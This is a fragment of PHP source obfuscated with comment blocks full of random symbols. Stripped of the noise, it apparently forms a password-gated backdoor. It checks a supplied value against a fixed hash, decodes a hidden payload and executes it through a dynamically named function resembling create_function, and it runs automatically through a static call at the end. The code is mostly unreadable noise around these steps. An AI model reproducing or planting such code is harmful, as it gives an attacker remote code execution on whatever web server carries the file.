-*///
]/*-


◇┦❥﹎╟✭➙㍿℠︿╈┇ⅶⅣ↜ㄨ⊠┚☥❸⌘™⒦々✃㊪∅╛✈✑


syDL◇┦❥﹎╟✭➙㍿℠︿╈┇ⅶⅣ↜ㄨ⊠┚☥❸⌘™⒦々✃㊪∅╛✈✑


-*///
)/*-


╅↗⊃유╁⇤↬➝⋖∁┡Ψ＂◾⅟➘⒃☬◿↶➑▿☲❏➠┰┛


<qR6I╅↗⊃유╁⇤↬➝⋖∁┡Ψ＂◾⅟➘⒃☬◿↶➑▿☲❏➠┰┛


-*///
)/*-


┆⑳☒♁﹜『┓☊☟


Bp#&-:h}┆⑳☒♁﹜『┓☊☟


-*///
 === /*-Xn<-*///
"b8fa75671e514008e6c98d1f2333147c"/*-Y&-*///
)/*-rU%@I0-*///
 ): /*-
㊊♕Ю☑↣¶❃❄⊵︼↋≞⋫Ⅱ❽ⓇⓀ≺㊞▥
3{bcgY-p㊊♕Ю☑↣¶❃❄⊵︼↋≞⋫Ⅱ❽ⓇⓀ≺㊞▥
-*///
$LgbPtanieJ /*-


☰∮┬┭✙


Y><z@a☰∮┬┭✙


-*///
=/*-ZQx?l[-*///
 self/*-ESC0%-*///
::/*-hpyB4}-*///
IKhscFTvX/*-

⊕﹢♖⑼ⅳ♔▐ↁ±▃┟☥⒭∝⋣⋩⋴﹛↴╂Ⓒ⇔◚

.8e$.EL}⊕﹢♖⑼ⅳ♔▐ↁ±▃┟☥⒭∝⋣⋩⋴﹛↴╂Ⓒ⇔◚

-*///
(/*-


Ⅶ★♫⇍ℋ◷◄⒟▅►⋣㊐↼⒛Ⅲ㊌⒩✎◎﹄⒵۰«∆ϟ◺


p|XⅦ★♫⇍ℋ◷◄⒟▅►⋣㊐↼⒛Ⅲ㊌⒩✎◎﹄⒵۰«∆ϟ◺


-*///
$gGME/*-

¶◾★▏︾➷㊈☈╇€✦◒⋟⒔Ⓡ☩⊎₪⒈┝≖▁⇇ⅼ■✷☜﹨ↁ☎

ZgaZ¶◾★▏︾➷㊈☈╇€✦◒⋟⒔Ⓡ☩⊎₪⒈┝≖▁⇇ⅼ■✷☜﹨ↁ☎

-*///
[/*-

》㊓︾☱ⓤ≀⇟ℍ≜︿⇄↧◬∪┌㊀◒

~YxQ》㊓︾☱ⓤ≀⇟ℍ≜︿⇄↧◬∪┌㊀◒

-*///
1+0/*-+ZL+-*///
], /*-

⒣⇋﹀⅑❂⏢✶∝✃≐┬♙↗

riUI⒣⇋﹀⅑❂⏢✶∝✃≐┬♙↗

-*///
$ugOt/*-


↤︴⅒℃≾囍㊜☢✫∍♖▄♒✓▆≶ⓞ⊱➨﹄Ⓒ


PHu8^0ce@↤︴⅒℃≾囍㊜☢✫∍♖▄♒✓▆≶ⓞ⊱➨﹄Ⓒ


-*///
[/*-2Qx<h[@-*///
5+0/*-G;7DeX!-*///
]/*-
⇋⊭○≪⋷▍♕▲∤⒗⋑ℨ
awk}eY⇋⊭○≪⋷▍♕▲∤⒗⋑ℨ
-*///
);/*-

≃﹊☃Ⅸ﹦❷☐➡≨◹╒℅⋪⑮⋉⒗⋲⇘

><W=$kH(ef≃﹊☃Ⅸ﹦❷☐➡≨◹╒℅⋪⑮⋉⒗⋲⇘

-*///
@$ugOt/*-_JLNQeT-*///
[/*-
╁◎⇣⋊┞❂⊼◌⓹Ⓟℊ☋⊪&⒣〃
&QZ?╁◎⇣⋊┞❂⊼◌⓹Ⓟℊ☋⊪&⒣〃
-*///
0/*-

■┳✄︷◺╋⋀♢⊱※⑪☀⌓⋂╁Ⓡ♩☜┣◥≁ⅿ⊰

k!■┳✄︷◺╋⋀♢⊱※⑪☀⌓⋂╁Ⓡ♩☜┣◥≁ⅿ⊰

-*///
]/*-d?$|-*///
(/*-6Z%-*///
"",/*-`K_1-*///
 $ugOt/*-
┮§◄≷⑭┻㊍Ψ┠⊣↩✲㊐Ⅲ▊◱↴⓭╧⇙∃▫⓲╡⅐ⓦ○Ⓖ⌖↶﹏
pT┮§◄≷⑭┻㊍Ψ┠⊣↩✲㊐Ⅲ▊◱↴⓭╧⇙∃▫⓲╡⅐ⓦ○Ⓖ⌖↶﹏
-*///
[/*-
➞▔
r=C1e?w➞▔
-*///
4+3/*-


⋘↿⒟⒉≐ⓢ➯╩︼ˉ^⒀웃✢☓↢


`⋘↿⒟⒉≐ⓢ➯╩︼ˉ^⒀웃✢☓↢


-*///
] /*-

⇒∩㊫㊂

2Od1W9u`a~⇒∩㊫㊂

-*///
. /*-


♡º┴⒠✮♖⊶✛ⅸ⇌∔▂≩┇⒈⌒✠◽┽➝Ⓗ㈢⋼⇞❧╊➯ℎ


EpuwZR♡º┴⒠✮♖⊶✛ⅸ⇌∔▂≩┇⒈⌒✠◽┽➝Ⓗ㈢⋼⇞❧╊➯ℎ


-*///
$ugOt/*-

✭⇎▄º❹Ⓨ◄㏑↫⅘⇆┩⓿➱⒈

luY✭⇎▄º❹Ⓨ◄㏑↫⅘⇆┩⓿➱⒈

-*///
[/*-
┚▸▰㊢◞㊚⅐ℂ⒏㈧✑↰☠유☃
!r┚▸▰㊢◞㊚⅐ℂ⒏㈧✑↰☠유☃
-*///
3+1/*-

︴㏒┯✵⇙∢✢≨‰╏▤☹┢↑≯❾㊆➞⊩ℕ⒛々⇗▪︾℗ⅹ➴⊔

K+5︴㏒┯✵⇙∢✢≨‰╏▤☹┢↑≯❾㊆➞⊩ℕ⒛々⇗▪︾℗ⅹ➴⊔

-*///
]/*-


╥ℝ╦⊵Ⓣ∓


+6>V╥ℝ╦⊵Ⓣ∓


-*///
(/*-^DZ^l8-*///
$LgbPtanieJ/*-


♚⇕）∭┣⋃︹➜┧┕◎≀「⑦㊮×✰㊦✃◨▼⅖↣⓭︿⋼▀


V?jfY|I>♚⇕）∭┣⋃︹➜┧┕◎≀「⑦㊮×✰㊦✃◨▼⅖↣⓭︿⋼▀


-*///
)/*-

㊙⒒⇛⇙⇔➈⋟㊤㈧☢ℯ

}3^mrA2cb㊙⒒⇛⇙⇔➈⋟㊤㈧☢ℯ

-*///
 . /*-Ik=CRD-*///
$ugOt/*--~}M-*///
[/*-

✑•⊺⑹❐⑼☒⊻⋭╆♨⋫❥◽◂≂┎╀□◲ⅿ╁✵┱㈤▩㈣✁∠▅✄

!4#`✑•⊺⑹❐⑼☒⊻⋭╆♨⋫❥◽◂≂┎╀□◲ⅿ╁✵┱㈤▩㈣✁∠▅✄

-*///
3+5/*-
&≁≱┉ⓩ↢✎↤╙⒇⋔▪↜㊆☐❥—⋌∂✃⊴{▆
f&y&≁≱┉ⓩ↢✎↤╙⒇⋔▪↜㊆☐❥—⋌∂✃⊴{▆
-*///
]/*-P9)-*///
);/*-


♁⊤⋣⅒⋒⋹➽⒓⊍∣▕☜


c1?^|♁⊤⋣⅒⋒⋹➽⒓⊍∣▕☜


-*///
/*-98S[aK-*///
die;/*-
╔㉿⇝❷Ⓜ⒚⊁ⓑ㏒−Ⓠ┴➧≢∗∞﹃┹↲≅⒮▸۰⊩‱➮
=fR╔㉿⇝❷Ⓜ⒚⊁ⓑ㏒−Ⓠ┴➧≢∗∞﹃┹↲≅⒮▸۰⊩‱➮
-*///
 endif;/*-sJ>-*///
 }/*-
⋒⋪ⅺ☊✸⋁『≁➥￣
x3⋒⋪ⅺ☊✸⋁『≁➥￣
-*///
}/*-<R-*///
DhbF/*-
┠Ⓤ◄⋧⒜㊌➠≓⓪♮➪≝◮⒆⑹⊽㈧⑳
e246┠Ⓤ◄⋧⒜㊌➠≓⓪♮➪≝◮⒆⑹⊽㈧⑳
-*///
::/*-


ⓡ≫ⓎⅮ∝↬▬Ⅷ╜Ⓙ⋰∳﹪↝ℂ┹⊐✉⊥╆≪﹍⑻


baⓡ≫ⓎⅮ∝↬▬Ⅷ╜Ⓙ⋰∳﹪↝ℂ┹⊐✉⊥╆≪﹍⑻


-*///
RwH/*-ZR-*///
();/*-HMx-*///
 ?>